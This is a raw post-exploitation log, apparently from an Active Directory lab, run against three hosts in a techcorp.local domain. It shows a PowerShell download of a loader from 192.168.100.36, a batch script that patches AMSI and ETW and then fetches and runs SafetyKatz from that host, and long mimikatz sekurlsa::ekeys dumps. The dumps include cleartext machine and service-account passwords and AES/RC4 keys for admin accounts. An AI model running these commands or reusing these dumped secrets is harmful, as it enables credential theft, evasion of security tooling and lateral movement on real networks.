cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 2219722 (00000000:0021deca)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:25:20 AM
SID : S-1-5-90-0-3
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 50365 (00000000:0000c4bd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:53 AM
SID : S-1-5-90-0-1
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 2219763 (00000000:0021def3)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:25:20 AM
SID : S-1-5-90-0-3
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 29977 (00000000:00007519)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:51 AM
SID : S-1-5-96-0-1
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : US-MSSQL$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:50 AM
SID : S-1-5-18
* Username : us-mssql$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 3e9b010d883ed1289099e3185eb59c0b846df40014a02bbe4a43228903355b3c
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 2217221 (00000000:0021d505)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 3:25:20 AM
SID : S-1-5-96-0-3
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 112017 (00000000:0001b591)
Session : Service from 0
User Name : dbservice
Domain : US
Logon Server : US-DC
Logon Time : 7/3/2024 3:00:08 AM
SID : S-1-5-21-210670787-2521448726-163245708-1121
* Username : dbservice
* Domain : US.TECHCORP.LOCAL
* Password : Us$r4RunningSQLSvc
* Key List :
aes256_hmac 60a8d36102239cd0026d105dbd1e4f253d244cd24d0abda135b4314cf468ca5f
aes128_hmac 7e3596366d5939b26888db98a20d6698
rc4_hmac_nt e060fc2798a6cc9d9ac0a3bb9bf5529b
rc4_hmac_old e060fc2798a6cc9d9ac0a3bb9bf5529b
rc4_md4 e060fc2798a6cc9d9ac0a3bb9bf5529b
rc4_hmac_nt_exp e060fc2798a6cc9d9ac0a3bb9bf5529b
rc4_hmac_old_exp e060fc2798a6cc9d9ac0a3bb9bf5529b
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : US-MSSQL$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:52 AM
SID : S-1-5-20
* Username : us-mssql$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 3e9b010d883ed1289099e3185eb59c0b846df40014a02bbe4a43228903355b3c
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 29887 (00000000:000074bf)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:51 AM
SID : S-1-5-96-0-0
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 104914 (00000000:000199d2)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 7/3/2024 3:00:06 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
Authentication Id : 0 ; 50340 (00000000:0000c4a4)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:53 AM
SID : S-1-5-90-0-1
* Username : US-MSSQL$
* Domain : us.techcorp.local
* Password : )mS[&gC;#3'"\\:dOMG&lP ?q<ir-7S5Ce]&[41Lfz_T#fv0u`?do,u[xSI%yGT/tEL&V(rwy:!A;MLDKKZ0hf0&14F$Z"+Hh5#)sLH<7LJNDt-?O$c'+Q+@6
* Key List :
aes256_hmac bfaf6c480e12780af8ced22c53821e0b5fe43a727e3338cc88cf2a6dc70adf0e
aes128_hmac 8c6685fc6b5047fd5b9037442b70cb40
rc4_hmac_nt ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old ccda609713cb52b1aa752ee23aaf2fae
rc4_md4 ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_nt_exp ccda609713cb52b1aa752ee23aaf2fae
rc4_hmac_old_exp ccda609713cb52b1aa752ee23aaf2fae
mimikatz(commandline) # exit
Bye!
US-MGMT
[us-mgmt]: PS C:\\Users\\Administrator.US\\Documents> wget -Uri <http://192.168.100.36/Loader.exe> -OutFile Loader.exe
[us-mgmt]: PS C:\\Users\\Administrator.US\\Documents> .\\Safety.bat
sekurlsa::ekeys
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting <http://192.168.100.36/SafetyKatz.exe> with args 'sekurlsa::ekeys exit'
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # <http://192.168.100.36/SafetyKatz.exe>
ERROR mimikatz_doLocal ; "<http://192.168.100.36/SafetyKatz.exe>" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # -Args
ERROR mimikatz_doLocal ; "-Args" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 49855 (00000000:0000c2bf)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:52 AM
SID : S-1-5-90-0-1
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 1518456 (00000000:00172b78)
Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : US
Logon Server : US-DC
Logon Time : 7/3/2024 3:23:53 AM
SID : S-1-5-21-210670787-2521448726-163245708-1115
* Username : mgmtadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f
rc4_hmac_nt e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old e53153fc2dc8d4c5a5839e46220717e5
rc4_md4 e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_nt_exp e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old_exp e53153fc2dc8d4c5a5839e46220717e5
Authentication Id : 0 ; 1518364 (00000000:00172b1c)
Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : US
Logon Server : US-DC
Logon Time : 7/3/2024 3:23:53 AM
SID : S-1-5-21-210670787-2521448726-163245708-1115
* Username : mgmtadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f
rc4_hmac_nt e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old e53153fc2dc8d4c5a5839e46220717e5
rc4_md4 e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_nt_exp e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old_exp e53153fc2dc8d4c5a5839e46220717e5
Authentication Id : 0 ; 1416170 (00000000:00159bea)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:20:26 AM
SID : S-1-5-90-0-2
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 30057 (00000000:00007569)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:51 AM
SID : S-1-5-96-0-0
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : US-MGMT$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:50 AM
SID : S-1-5-18
* Username : us-mgmt$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac cc3e643e73ce17a40a20d0fe914e2d090264ac6babbb86e99e74d74016ed51b2
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 1410457 (00000000:00158599)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 3:20:26 AM
SID : S-1-5-96-0-2
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 49785 (00000000:0000c279)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:52 AM
SID : S-1-5-90-0-1
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : US-MGMT$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:51 AM
SID : S-1-5-20
* Username : us-mgmt$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac cc3e643e73ce17a40a20d0fe914e2d090264ac6babbb86e99e74d74016ed51b2
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 30166 (00000000:000075d6)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:51 AM
SID : S-1-5-96-0-1
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
Authentication Id : 0 ; 1416235 (00000000:00159c2b)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:20:26 AM
SID : S-1-5-90-0-2
* Username : US-MGMT$
* Domain : us.techcorp.local
* Password : 5k:=71Bwt*<iIqp"P\\p5DgsJ[^j=i,<;kKSe1hB;qSVkUMqHQ1Ky$vJ?r]#;0bKdotMJHd@L#&.Aaz\\@2ml@a+@0c<GYHOyubBK$7JEm6o]6\\PLZS-ar3GKM
* Key List :
aes256_hmac a482f25201274e7b6088680d0159895ddba763cab7ddf736ec9bd9919c697cca
aes128_hmac 31e8df3539171e9dd6ab71b04408492a
rc4_hmac_nt fae951131d684b3318f524c535d36fb2
rc4_hmac_old fae951131d684b3318f524c535d36fb2
rc4_md4 fae951131d684b3318f524c535d36fb2
rc4_hmac_nt_exp fae951131d684b3318f524c535d36fb2
rc4_hmac_old_exp fae951131d684b3318f524c535d36fb2
mimikatz(commandline) # exit
Bye!
US-HELPDESK
[us-helpdesk]: PS C:\\Users\\Administrator.US\\Documents> .\\Safety.bat
sekurlsa::ekeys
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting <http://192.168.100.36/SafetyKatz.exe> with args 'sekurlsa::ekeys exit'
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # <http://192.168.100.36/SafetyKatz.exe>
ERROR mimikatz_doLocal ; "<http://192.168.100.36/SafetyKatz.exe>" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # -Args
ERROR mimikatz_doLocal ; "-Args" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 1376022 (00000000:0014ff16)
Session : RemoteInteractive from 2
User Name : helpdeskadmin
Domain : US
Logon Server : US-DC
Logon Time : 7/3/2024 3:15:40 AM
SID : S-1-5-21-210670787-2521448726-163245708-1120
* Username : helpdeskadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534
rc4_hmac_nt 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old 94b4a7961bb45377f6e7951b0d8630be
rc4_md4 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_nt_exp 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old_exp 94b4a7961bb45377f6e7951b0d8630be
Authentication Id : 0 ; 1375899 (00000000:0014fe9b)
Session : RemoteInteractive from 2
User Name : helpdeskadmin
Domain : US
Logon Server : US-DC
Logon Time : 7/3/2024 3:15:40 AM
SID : S-1-5-21-210670787-2521448726-163245708-1120
* Username : helpdeskadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534
rc4_hmac_nt 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old 94b4a7961bb45377f6e7951b0d8630be
rc4_md4 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_nt_exp 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old_exp 94b4a7961bb45377f6e7951b0d8630be
Authentication Id : 0 ; 50477 (00000000:0000c52d)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:52 AM
SID : S-1-5-90-0-1
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 30033 (00000000:00007551)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:50 AM
SID : S-1-5-96-0-1
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : US-HELPDESK$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:49 AM
SID : S-1-5-18
* Username : us-helpdesk$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
